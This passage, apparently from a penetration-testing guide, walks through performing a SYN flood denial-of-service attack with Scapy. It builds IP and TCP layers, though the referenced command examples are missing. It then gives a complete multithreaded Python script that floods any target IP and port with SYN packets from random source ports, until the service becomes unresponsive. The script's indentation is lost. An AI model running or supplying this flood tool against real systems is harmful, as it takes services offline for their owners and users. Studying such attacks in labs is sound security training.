To perform a SYN flood using Scapy, follow the given steps:

1. We need to get started by sending TCP SYN requests to the port associated with the target service. To send a TCP SYN request to any given port, we must first build the layers of this request. The first layer that we will need to construct is the IP layer:

2. To build the IP layer of our request, we should assign the IP object to the variable i. By calling the display() function, we can identify the attribute configurations for the object. By default, both the sending and receiving addresses are set to the loopback address of 127.0.0.1. These values can be modified by changing the destination address by setting i.dst equal to the string value of the address we wish to scan. By calling the display() function again, we can see that not only has the destination address been updated, but Scapy also will automatically update the source IP address to the address associated with the default interface.
3. Now that we have constructed the IP layer of the request, we should proceed to the TCP layer:

4. To build the TCP layer of our request, we will use the same technique as we did for the IP layer. In the example provided, the TCP object was assigned to the t variable. As discussed earlier, the default configurations can be identified by calling the display() function. Here, we can see that the default value for the destination port is the HTTP port 80. For our initial scan, we will leave the default TCP configurations as they are.
5. Now that we have created both the IP and TCP layers, we need to construct the request by stacking these layers:

6. The IP and TCP layers can be stacked by separating the variables with a forward slash. These layers can then be set equal to a new variable that will represent the entire request. The display() function can then be called to view the configurations for the request.

7. Once the request has been built, this can then be passed to the send and receive functions so that we can analyze the response:

8. The same request can be performed without independently building and stacking each layer. Instead, a single one-line command can be used by calling the functions directly and passing the appropriate arguments to them:

9. The effectiveness of the SYN flood depends on the number of SYN requests that can be generated in a given period of time. To improve the effectiveness of this attack sequence, I have written a multithreaded script that can perform as many concurrent processes of SYN packet injection as can be handled by an attacking system:

        #!/usr/bin/python

        from scapy.all import *
        from time import sleep
        import thread
        import random
        import logging
        logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

        if len(sys.argv) != 4:
        print "Usage - ./syn_flood.py [Target-IP]
         [Port Number] [Threads]"
        print "Example - ./syn_flood.py 10.0.0.5 80 20"
        print "Example will perform a 20x multi-threaded
         SYN flood attack"
        print "against the HTTP (port 80) service on 10.0.0.5"
        sys.exit()

        target = str(sys.argv[1])
        port = int(sys.argv[2])
        threads = int(sys.argv[3])

        print "Performing SYN flood. Use Ctrl+C to stop attack."
        def synflood(target,port):
        while 0 == 0:
        x = random.randint(0,65535)
        send(IP(dst=target)/TCP(dport=port,sport=x),verbose=0)

        for x in range(0,threads):
        thread.start_new_thread(synflood, (target,port))

        while 0 == 0:
        sleep(1)

10. The script accepts three arguments upon execution. These arguments include the target IP address, the port number that the SYN flood will be sent to, and the number of threads or concurrent processes that will be used to execute the SYN flood.
11. Each thread starts by generating an integer value between 0 and 65,535. This range represents the total possible values that can be assigned to the source port. The portions of the TCP header that define the source and destination port addresses are both 16 bits in length. Each bit can retain a value of 1 or 0.
12. As such, there are 2¹⁶, or 65,536, possible TCP port addresses. A single source port can only hold a single half-open connection, so by generating unique source port addresses for each SYN request, we can drastically improve the performance of the attack:

13. When the script is executed without any arguments, the usage is returned to the user. In the example provided, the script is then executed against the HTTP web service hosted on the TCP port 80 of 172.16.69.128, with 20 concurrent threads.
14. The script itself provides little feedback; however, a traffic capture utility such as Wireshark or TCPdump can be run to verify that the connections are being sent. After a very brief moment, connection attempts to the server will become very slow or altogether unresponsive.